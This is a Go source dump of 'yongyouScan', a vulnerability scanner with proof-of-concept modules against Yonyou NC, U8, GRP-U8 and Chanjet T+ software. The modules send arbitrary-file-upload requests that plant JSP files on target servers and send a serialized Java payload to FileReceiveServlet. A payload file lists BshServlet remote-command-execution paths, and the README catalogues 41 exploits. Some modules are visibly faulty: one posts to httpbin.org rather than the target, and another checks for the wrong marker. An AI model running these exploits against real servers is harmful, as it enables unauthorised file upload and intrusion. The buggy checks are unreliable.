38 | 	color.Red.Println("[-] 用友 uapws 认证绕过漏洞不存在")
39 | }
40 | 


--------------------------------------------------------------------------------
/pkg/POC/T-Uploadfile/T-Uploadfile.go:
--------------------------------------------------------------------------------
 1 | package T_Uploadfile
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/tplus/SM/SetupAccount/Upload.aspx?preload=1"
16 | 	data := "------WebKitFormBoundarywwk2ReqGTj7lNYlt\nContent-Disposition: form-data; name=\"File1\";filename=\"222.aspx\"\nContent-Type: image/jpeg\n\n1\n------WebKitFormBoundarywwk2ReqGTj7lNYlt--"
17 | 	resp, err := client.R().EnableForceMultipart().
18 | 		SetHeaders(map[string]string{ // Set multiple headers at once
19 | 			"User-Agent":   UA,
20 | 			"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYlt",
21 | 		}).SetBody(data).Post(url)
22 | 	if err != nil {
23 | 		color.Red.Println("[-] 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞不存在")
24 | 		return
25 | 	}
26 | 	if resp.Status == "200 OK" {
27 | 		color.Green.Println("[+] 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞存在 -> " + url)
28 | 		return
29 | 	}
30 | 	color.Red.Println("[-] 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞不存在")
31 | }
32 | 


--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
 1 | module yongyouScan
 2 | 
 3 | go 1.21.4
 4 | 
 5 | require (
 6 | 	github.com/gookit/color v1.5.4
 7 | 	github.com/imroc/req/v3 v3.42.2
 8 | )
 9 | 
10 | require (
11 | 	github.com/andybalholm/brotli v1.0.5 // indirect
12 | 	github.com/cloudflare/circl v1.3.3 // indirect
13 | 	github.com/gaukas/godicttls v0.0.4 // indirect
14 | 	github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 // indirect
15 | 	github.com/google/pprof v0.0.0-20230901174712-0191c66da455 // indirect
16 | 	github.com/hashicorp/errwrap v1.1.0 // indirect
17 | 	github.com/hashicorp/go-multierror v1.1.1 // indirect
18 | 	github.com/klauspost/compress v1.16.7 // indirect
19 | 	github.com/onsi/ginkgo/v2 v2.12.0 // indirect
20 | 	github.com/quic-go/qpack v0.4.0 // indirect
21 | 	github.com/quic-go/qtls-go1-20 v0.4.1 // indirect
22 | 	github.com/quic-go/quic-go v0.40.0 // indirect
23 | 	github.com/refraction-networking/utls v1.5.4 // indirect
24 | 	github.com/xo/terminfo v0.0.0-20210125001918-ca9a967f8778 // indirect
25 | 	go.uber.org/mock v0.3.0 // indirect
26 | 	golang.org/x/crypto v0.12.0 // indirect
27 | 	golang.org/x/exp v0.0.0-20230817173708-d852ddb80c63 // indirect
28 | 	golang.org/x/mod v0.12.0 // indirect
29 | 	golang.org/x/net v0.14.0 // indirect
30 | 	golang.org/x/sys v0.12.0 // indirect
31 | 	golang.org/x/text v0.13.0 // indirect
32 | 	golang.org/x/tools v0.12.1-0.20230815132531-74c255bcf846 // indirect
33 | )
34 | 


--------------------------------------------------------------------------------
/pkg/POC/accept-upload/accept-upload.go:
--------------------------------------------------------------------------------
 1 | package accept_upload
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/aim/equipmap/accept.jsp"
16 | 	data := "-----------------------------16314487820932200903769468567\nContent-Disposition: form-data; name=\"upload\"; filename=\"2XOSxplUo2EnwilSNJazJYZxZUc.txt\"\nContent-Type: text/plain\n\n<% out.println(\"2XOSxnJbIM7VyX60FJvryCft1X5\"); %>\n-----------------------------16314487820932200903769468567\nContent-Disposition: form-data; name=\"fname\"\n\n\\webapps\\nc_web\\2XOSxnFIgjeaGE7MQmmZiv3Imfw.jsp\n-----------------------------16314487820932200903769468567--"
17 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
18 | 		"User-Agent":   UA,
19 | 		"Content-Type": "multipart/form-data; boundary=---------------------------16314487820932200903769468567",
20 | 	}).SetBody(data).Post(url)
21 | 	if err != nil {
22 | 		color.Red.Println("[-] 用友 accept 任意文件上传漏洞不存在")
23 | 		return
24 | 	}
25 | 	if resp.Status == "200 OK" {
26 | 		color.Green.Println("[+] 用友 accept 任意文件上传漏洞存在 -> " + url)
27 | 		return
28 | 	}
29 | 	color.Red.Println("[-] 用友 accept 任意文件上传漏洞不存在")
30 | }
31 | 


--------------------------------------------------------------------------------
/.github/conf/.goreleaser.yml:
--------------------------------------------------------------------------------
 1 | before:
 2 |   hooks:
 3 |     - go mod tidy
 4 | builds:
 5 |   -
 6 |     id: default
 7 |     env:
 8 |       - CGO_ENABLED=0
 9 |     goos:
10 |       - windows
11 |       - linux
12 |       - darwin
13 |       - freebsd
14 |       - solaris
15 |     goarch:
16 |       - amd64
17 |       - "386"
18 |       - arm
19 |       - arm64
20 |       - mips
21 |       - mipsle
22 |       - mips64
23 |     goarm:
24 |       - "6"
25 |       - "7"
26 |     flags:
27 |       - -trimpath
28 |     ldflags:
29 |       - -s -w
30 | upx:
31 |   -
32 |     ids: [ default ]
33 |     enabled: true
34 |     goos: ["windows", "linux"]
35 |     goarch: ["amd64", "386"]
36 |     compress: best
37 | #    lzma: true
38 | #    brute: true
39 | archives:
40 |   -
41 |     format: binary
42 |     allow_different_binary_count: true
43 |     name_template: >-
44 |       {{- .ProjectName }}
45 |       {{- if eq .Os "darwin"}}_mac
46 |       {{- else if eq .Os "linux"}}
47 |       {{- else if eq .Os "windows"}}
48 |       {{- else }}_{{ .Os }}{{ end }}
49 |       {{- if eq .Arch "amd64" }}
50 |       {{- else if eq .Arch "386" }}32
51 |       {{- else }}_{{ .Arch }}{{ end }}
52 |       {{- if .Arm }}v{{ .Arm }}{{ end -}}
53 | checksum:
54 |   name_template: 'checksums.txt'
55 | snapshot:
56 |   name_template: "{{ incpatch .Version }}-next"
57 | changelog:
58 |   sort: asc
59 |   filters:
60 |     exclude:
61 |       - '^docs:'
62 |       - '^test:'
63 |       - "^*.md"
64 |       - "^*.ya?ml"
65 | 


--------------------------------------------------------------------------------
/pkg/POC/GRP-U8-U8AppProxy/GRP-U8-U8AppProxy.go:
--------------------------------------------------------------------------------
 1 | package GRP_U8_U8AppProxy
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"strings"
 7 | 	"time"
 8 | )
 9 | 
10 | var (
11 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
12 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
13 | )
14 | 
15 | func Run(url string) {
16 | 	url1 := url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../yongyouU8_test"
17 | 	data := "--59229605f98b8cf290a7b8908b34616b\nContent-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\nContent-Type: image/png\n \n<% out.println(\"yongyouu8\");%>\n--59229605f98b8cf290a7b8908b34616b--"
18 | 	_, err := client.R().
19 | 		SetHeaders(map[string]string{ // Set multiple headers at once
20 | 			"User-Agent":   UA,
21 | 			"Content-Type": "multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b",
22 | 		}).SetBody(data).Post(url1)
23 | 	if err != nil {
24 | 		color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
25 | 		return
26 | 	}
27 | 	resp1, err1 := client.R().
28 | 		SetHeaders(map[string]string{ // Set multiple headers at once
29 | 			"User-Agent": UA,
30 | 		}).Get(url + "/yongyouU8_test.jsp")
31 | 	if err1 != nil {
32 | 		color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
33 | 		return
34 | 	}
35 | 	if strings.Contains(resp1.String(), "yongyouu8") {
36 | 		color.Green.Println("[+] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞存在")
37 | 		return
38 | 	}
39 | 	color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
40 | }
41 | 


--------------------------------------------------------------------------------
/pkg/dnslog/dnslog.go:
--------------------------------------------------------------------------------
 1 | package dnslog
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"math/rand"
 7 | 	"time"
 8 | )
 9 | 
10 | var (
11 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest()
12 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
13 | )
14 | 
15 | func randCreator() string {
16 | 	str := "0123456789abcdefghigklmnopqrstuvwxyz"
17 | 	strList := []byte(str)
18 | 	result := []byte{}
19 | 	i := 0
20 | 	r := rand.New(rand.NewSource(time.Now().UnixNano()))
21 | 	for i < 26 {
22 | 		new := strList[r.Intn(len(strList))]
23 | 		result = append(result, new)
24 | 		i = i + 1
25 | 	}
26 | 	return string(result)
27 | }
28 | 
29 | func GetDnslogUrl() (string, string) {
30 | 	session := randCreator()
31 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
32 | 		"User-Agent": UA,
33 | 		"Cookie":     "PHPSESSID=" + session,
34 | 	}).Get("http://www.dnslog.cn/getdomain.php")
35 | 	if err != nil {
36 | 		if resp == nil {
37 | 			fmt.Println("与dns平台网络不可达,请检查网络")
38 | 			return "", ""
39 | 		}
40 | 	}
41 | 	return resp.String(), session
42 | }
43 | 
44 | func GetDnslogRecord(PHPSESSID string) bool {
45 | 	time.Sleep(3 * time.Second)
46 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
47 | 		"User-Agent": UA,
48 | 		"Cookie":     "PHPSESSID=" + PHPSESSID,
49 | 	}).Get("http://www.dnslog.cn/getrecords.php")
50 | 	if err != nil {
51 | 		fmt.Println("与dns平台网络不可达,请检查网络")
52 | 		return false
53 | 	}
54 | 	if resp.String() == "[]" {
55 | 		return false
56 | 	} else {
57 | 		return true
58 | 	}
59 | 	return false
60 | }
61 | 


--------------------------------------------------------------------------------
/pkg/POC/GRP-U8-UploadFileData/GRP-U8-UploadFileData.go:
--------------------------------------------------------------------------------
 1 | package GRP_U8_UploadFileData
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"strings"
 7 | 	"time"
 8 | )
 9 | 
10 | var (
11 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
12 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
13 | )
14 | 
15 | func Run(url string) {
16 | 	url1 := url + "/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=..%2F&filename=94156577.jsp&filename=1.jpg"
17 | 	data := "--ec126a48c5b7676dce1b676f5251358f\nContent-Disposition: form-data; \n\n<% out.println(\"3135168535\");%>\n--ec126a48c5b7676dce1b676f5251358f--"
18 | 	_, err := client.R().
19 | 		SetHeaders(map[string]string{ // Set multiple headers at once
20 | 			"User-Agent":   UA,
21 | 			"Content-Type": "multipart/form-data; boundary=ec126a48c5b7676dce1b676f5251358f",
22 | 		}).SetBody(data).Post(url1)
23 | 	if err != nil {
24 | 		color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
25 | 		return
26 | 	}
27 | 	resp1, err1 := client.R().
28 | 		SetHeaders(map[string]string{ // Set multiple headers at once
29 | 			"User-Agent": UA,
30 | 		}).Get(url + "/R9iPortal/94156577.jsp")
31 | 	if err1 != nil {
32 | 		color.Red.Println("[-] 用友 GRP-U8 UploadFileData 任意文件上传漏洞不存在")
33 | 		return
34 | 	}
35 | 	if strings.Contains(resp1.String(), "yongyouu8") {
36 | 		color.Green.Println("[+] 用友 GRP-U8 UploadFileData 任意文件上传漏洞存在")
37 | 		return
38 | 	}
39 | 	color.Red.Println("[-] 用友 GRP-U8 UploadFileData 任意文件上传漏洞不存在")
40 | }
41 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # yongyouScan
 2 | 
 3 | # 单个检测
 4 | ```go
 5 | yongyouScan.exe -u "http://127.0.0.1"
 6 | ```
 7 | 
 8 | # 批量检测
 9 | ```go
10 | yongyouScan.exe -f "C:\targets.txt"
11 | ```
12 | 
13 | # 🐳POC
14 | 
15 | <details>
16 | <summary>POC共有41个</summary>
17 | <pre><code>
18 | 用友 NC MessageServlet反序列化漏洞
19 | 用友 NC UploadServlet反序列化漏洞
20 | 用友 NC 6.5 未授权文件上传漏洞
21 | 用友 NC MonitorServlet反序列化漏洞
22 | 用友 GRP-U8 Proxy SQL注入漏洞
23 | 用友 NC 配置文件泄露漏洞
24 | 用友 NCCloud FS 文件管理 SQL 注入
25 | 用友 ERP-NC 目录遍历漏洞
26 | 用友 NC IUpdateService XXE漏洞
27 | 用友 Uapjs JNDI注入漏洞
28 | 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
29 | 用友 U8 OA test.jsp SQL注入漏洞
30 | 用友 accept 任意文件上传漏洞
31 | 畅捷通T+ DownloadProxy任意文件读取漏洞
32 | 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞
33 | 用友 U8 RegisterServlet反序列化漏洞
34 | 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
35 | 用友 文件服务器 认证绕过漏洞
36 | 用友 uapws 认证绕过漏洞
37 | 用友 U8 CacheInvokeServlet反序列化漏洞
38 | 用友 U8 TableInputOperServlet反序列化漏洞
39 | 用友 files 反序列化漏洞
40 | 用友 U8 ActionHandlerServlet反序列化漏洞
41 | 用友 U8 MxServlet反序列化漏洞
42 | 用友 U8 ServletCommander反序列化漏洞
43 | 用友 GRP-U8 UploadFileData 任意文件上传漏洞
44 | 用友 U8 MonitorServlet反序列化漏洞
45 | 用友 uapws 认证绕过漏洞
46 | 用友 U8 LoginServlet反序列化漏洞
47 | 用友 U8 FileTransportServlet反序列化漏洞
48 | 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞
49 | 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
50 | 用友时空 KSOA 多处SQL注入漏洞
51 | 用友 U8 TaskTreeQuery SQL注入漏洞
52 | 用友 文件服务器 认证绕过漏洞
53 | 用友NC XbrlPersistenceServlet反序列化漏洞
54 | 用友 U8 ClientRequestDispatch反序列化漏洞
55 | 用友 FileReceiveServlet反序列化漏洞
56 | 用友 NC JiuQiClientReqDispatch反序列化漏洞
57 | 用友 GRP-U8 U8AppProxy 任意文件上传漏洞
58 | 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
59 | </code></pre>
60 | </details>
61 | 
62 | # 👮免责声明
63 | 
64 | 该工具仅用于安全自查检测
65 | 
66 | 由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。
67 | 
68 | 本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许，不得善自使用本工具进行任何攻击活动，不得以任何方式将其用于商业目的。
69 | 


--------------------------------------------------------------------------------
/pkg/POC/NC6.5-UploadFile/yonyou-NC6.5-UploadFile.go:
--------------------------------------------------------------------------------
 1 | package NC6_5_UploadFile
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"strings"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().EnableDumpAllWithoutResponse()
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/servlet/FileReceiveServlet"
16 | 	uploadData := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
17 | 	shellFlag := "t0test0ls"
18 | 	uploadData += shellFlag
19 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
20 | 		"User-Agent": UA,
21 | 		"Referer":    "https://google.com",
22 | 	}).SetHeaders(map[string]string{ // Set multiple headers at once
23 | 		"data": uploadData,
24 | 	}).Post("https://httpbin.org/post")
25 | 	if err != nil {
26 | 		color.Red.Println("[-] 用友 NC 6.5 未授权文件上传漏洞不存在")
27 | 		return
28 | 	}
29 | 	if resp.Status == "200 OK" {
30 | 		resp1 := req.MustGet(url + "u+/t00ls.jsp")
31 | 		if strings.Contains(resp1.String(), shellFlag) {
32 | 			color.Red.Println("[-] 用友 NC 6.5 未授权文件上传漏洞存在，访问 -> " + url + "u+/t00ls.jsp")
33 | 			return
34 | 		}
35 | 	}
36 | 	color.Red.Println("[-] 用友 NC 6.5 未授权文件上传漏洞不存在")
37 | }
38 | 


--------------------------------------------------------------------------------
/pkg/qi/qi.go:
--------------------------------------------------------------------------------
 1 | package qi
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | var (
12 | 	green  = []*color.Style256{color.S256(46), color.S256(47), color.S256(48), color.S256(49), color.S256(50), color.S256(51)}
13 | 	pink   = []*color.Style256{color.S256(214), color.S256(215), color.S256(216), color.S256(217), color.S256(218), color.S256(219)}
14 | 	yellow = []*color.Style256{color.S256(226), color.S256(227), color.S256(228), color.S256(229), color.S256(230), color.S256(231)}
15 | )
16 | 
17 | func ReadLinesFromFile(filename string) ([]string, error) {
18 | 	file, err := os.Open(filename)
19 | 	if err != nil {
20 | 		return nil, fmt.Errorf("打开文件错误: %v", err)
21 | 	}
22 | 	defer file.Close()
23 | 	scanner := bufio.NewScanner(file)
24 | 	lines := []string{}
25 | 	for scanner.Scan() {
26 | 		line := scanner.Text()
27 | 		lines = append(lines, line)
28 | 	}
29 | 	if err := scanner.Err(); err != nil {
30 | 		return nil, fmt.Errorf("文件读取错误: %v", err)
31 | 	}
32 | 	return lines, nil
33 | }
34 | 
35 | func gradient(text string, coloRR []*color.Style256) string {
36 | 	lines := strings.Split(text, "\n")
37 | 
38 | 	var output string
39 | 
40 | 	t := len(text) / 6
41 | 	i := 0
42 | 	j := 0
43 | 	for l := 0; l < len(lines); l++ {
44 | 		str := strings.Split(lines[l], "")
45 | 		for _, x := range str {
46 | 			j++
47 | 			output += coloRR[i].Sprint(x)
48 | 			if j > t {
49 | 				i++
50 | 				j = 0
51 | 			}
52 | 		}
53 | 		if len(lines) != 0 {
54 | 			output += "\n"
55 | 		}
56 | 	}
57 | 
58 | 	return strings.TrimRight(output, "\n")
59 | }
60 | 
61 | func Logo() {
62 | 	logo1 := "                                        \n                                        \n██\\   ██\\  ██████\\  ███████\\   ██████\\  \n██ |  ██ |██  __██\\ ██  __██\\ ██  __██\\ \n██ |  ██ |██ /  ██ |██ |  ██ |██ /  ██ |\n██ |  ██ |██ |  ██ |██ |  ██ |██ |  ██ |\n\\███████ |\\██████  |██ |  ██ |\\███████ |\n \\____██ | \\______/ \\__|  \\__| \\____██ |\n██\\   ██ |                    ██\\   ██ |\n\\██████  |                    \\██████  |\n \\______/                      \\______/ "
63 | 	fmt.Println(gradient(logo1, yellow))
64 | 	fmt.Println(gradient("by qi4l", yellow))
65 | }
66 | 


--------------------------------------------------------------------------------
/pkg/POC/NC-BshServlet/payload.txt:
--------------------------------------------------------------------------------
 1 | /service/~aim/bsh.servlet.BshServlet
 2 | /service/~alm/bsh.servlet.BshServlet
 3 | /service/~ampub/bsh.servlet.BshServlet
 4 | /service/~arap/bsh.servlet.BshServlet
 5 | /service/~aum/bsh.servlet.BshServlet
 6 | /service/~cc/bsh.servlet.BshServlet
 7 | /service/~cdm/bsh.servlet.BshServlet
 8 | /service/~cmp/bsh.servlet.BshServlet
 9 | /service/~ct/bsh.servlet.BshServlet
10 | /service/~dm/bsh.servlet.BshServlet
11 | /service/~erm/bsh.servlet.BshServlet
12 | /service/~fa/bsh.servlet.BshServlet
13 | /service/~fac/bsh.servlet.BshServlet
14 | /service/~fbm/bsh.servlet.BshServlet
15 | /service/~ff/bsh.servlet.BshServlet
16 | /service/~fip/bsh.servlet.BshServlet
17 | /service/~fipub/bsh.servlet.BshServlet
18 | /service/~fp/bsh.servlet.BshServlet
19 | /service/~fts/bsh.servlet.BshServlet
20 | /service/~fvm/bsh.servlet.BshServlet
21 | /service/~gl/bsh.servlet.BshServlet
22 | /service/~hrhi/bsh.servlet.BshServlet
23 | /service/~hrjf/bsh.servlet.BshServlet
24 | /service/~hrpd/bsh.servlet.BshServlet
25 | /service/~hrpub/bsh.servlet.BshServlet
26 | /service/~hrtrn/bsh.servlet.BshServlet
27 | /service/~hrwa/bsh.servlet.BshServlet
28 | /service/~ia/bsh.servlet.BshServlet
29 | /service/~ic/bsh.servlet.BshServlet
30 | /service/~iufo/bsh.servlet.BshServlet
31 | /service/~modules/bsh.servlet.BshServlet
32 | /service/~mpp/bsh.servlet.BshServlet
33 | /service/~obm/bsh.servlet.BshServlet
34 | /service/~pu/bsh.servlet.BshServlet
35 | /service/~qc/bsh.servlet.BshServlet
36 | /service/~sc/bsh.servlet.BshServlet
37 | /service/~scmpub/bsh.servlet.BshServlet
38 | /service/~so/bsh.servlet.BshServlet
39 | /service/~so2/bsh.servlet.BshServlet
40 | /service/~so3/bsh.servlet.BshServlet
41 | /service/~so4/bsh.servlet.BshServlet
42 | /service/~so5/bsh.servlet.BshServlet
43 | /service/~so6/bsh.servlet.BshServlet
44 | /service/~tam/bsh.servlet.BshServlet
45 | /service/~tbb/bsh.servlet.BshServlet
46 | /service/~to/bsh.servlet.BshServlet
47 | /service/~uap/bsh.servlet.BshServlet
48 | /service/~uapbd/bsh.servlet.BshServlet
49 | /service/~uapde/bsh.servlet.BshServlet
50 | /service/~uapeai/bsh.servlet.BshServlet
51 | /service/~uapother/bsh.servlet.BshServlet
52 | /service/~uapqe/bsh.servlet.BshServlet
53 | /service/~uapweb/bsh.servlet.BshServlet
54 | /service/~uapws/bsh.servlet.BshServlet
55 | /service/~vrm/bsh.servlet.BshServlet
56 | /service/~yer/bsh.servlet.BshServlet


--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
 1 | github.com/andybalholm/brotli v1.0.5 h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs=
 2 | github.com/andybalholm/brotli v1.0.5/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig=
 3 | github.com/cloudflare/circl v1.3.3 h1:fE/Qz0QdIGqeWfnwq0RE0R7MI51s0M2E4Ga9kq5AEMs=
 4 | github.com/cloudflare/circl v1.3.3/go.mod h1:5XYMA4rFBvNIrhs50XuiBJ15vF2pZn4nnUKZrLbUZFA=
 5 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 6 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
 7 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 8 | github.com/gaukas/godicttls v0.0.4 h1:NlRaXb3J6hAnTmWdsEKb9bcSBD6BvcIjdGdeb0zfXbk=
 9 | github.com/gaukas/godicttls v0.0.4/go.mod h1:l6EenT4TLWgTdwslVb4sEMOCf7Bv0JAK67deKr9/NCI=
10 | github.com/go-logr/logr v1.2.4 h1:g01GSCwiDw2xSZfjJ2/T9M+S6pFdcNtFYsp+Y43HYDQ=
11 | github.com/go-logr/logr v1.2.4/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
12 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 h1:tfuBGBXKqDEevZMzYi5KSi8KkcZtzBcTgAUUtapy0OI=
13 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572/go.mod h1:9Pwr4B2jHnOSGXyyzV8ROjYa2ojvAY6HCGYYfMoC3Ls=
14 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg=
15 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
16 | github.com/google/go-cmp v0.5.9 h1:O2Tfq5qg4qc4AmwVlvv0oLiVAGB7enBSJ2x2DqQFi38=
17 | github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
18 | github.com/google/pprof v0.0.0-20230901174712-0191c66da455 h1:YhRUmI1ttDC4sxKY2V62BTI8hCXnyZBV9h38eAanInE=
19 | github.com/google/pprof v0.0.0-20230901174712-0191c66da455/go.mod h1:czg5+yv1E0ZGTi6S6vVK1mke0fV+FaUhNGcd6VRS9Ik=
20 | github.com/gookit/color v1.5.4 h1:FZmqs7XOyGgCAxmWyPslpiok1k05wmY3SJTytgvYFs0=
21 | github.com/gookit/color v1.5.4/go.mod h1:pZJOeOS8DM43rXbp4AZo1n9zCU2qjpcRko0b6/QJi9w=
22 | github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
23 | github.com/hashicorp/errwrap v1.1.0 h1:OxrOeh75EUXMY8TBjag2fzXGZ40LB6IKw45YeGUDY2I=
24 | github.com/hashicorp/errwrap v1.1.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
25 | github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
26 | github.com/hashicorp/go-multierror v1.1.1/go.mod h1:iw975J/qwKPdAO1clOe2L8331t/9/fmwbPZ6JB6eMoM=
27 | github.com/imroc/req/v3 v3.42.2 h1:/BwrKXGR7X1/ptccaQAiziDCeZ7T6ye55g3ZhiLy1fc=
28 | github.com/imroc/req/v3 v3.42.2/go.mod h1:W7dOrfQORA9nFoj+CafIZ6P5iyk+rWdbp2sffOAvABU=
29 | github.com/klauspost/compress v1.16.7 h1:2mk3MPGNzKyxErAw8YaohYh69+pa4sIQSC0fPGCFR9I=
30 | github.com/klauspost/compress v1.16.7/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE=
31 | github.com/onsi/ginkgo/v2 v2.12.0 h1:UIVDowFPwpg6yMUpPjGkYvf06K3RAiJXUhCxEwQVHRI=
32 | github.com/onsi/ginkgo/v2 v2.12.0/go.mod h1:ZNEzXISYlqpb8S36iN71ifqLi3vVD1rVJGvWRCJOUpQ=
33 | github.com/onsi/gomega v1.27.10 h1:naR28SdDFlqrG6kScpT8VWpu1xWY5nJRCF3XaYyBjhI=
34 | github.com/onsi/gomega v1.27.10/go.mod h1:RsS8tutOdbdgzbPtzzATp12yT7kM5I5aElG3evPbQ0M=
35 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
36 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
37 | github.com/quic-go/qpack v0.4.0 h1:Cr9BXA1sQS2SmDUWjSofMPNKmvF6IiIfDRmgU0w1ZCo=
38 | github.com/quic-go/qpack v0.4.0/go.mod h1:UZVnYIfi5GRk+zI9UMaCPsmZ2xKJP7XBUvVyT1Knj9A=
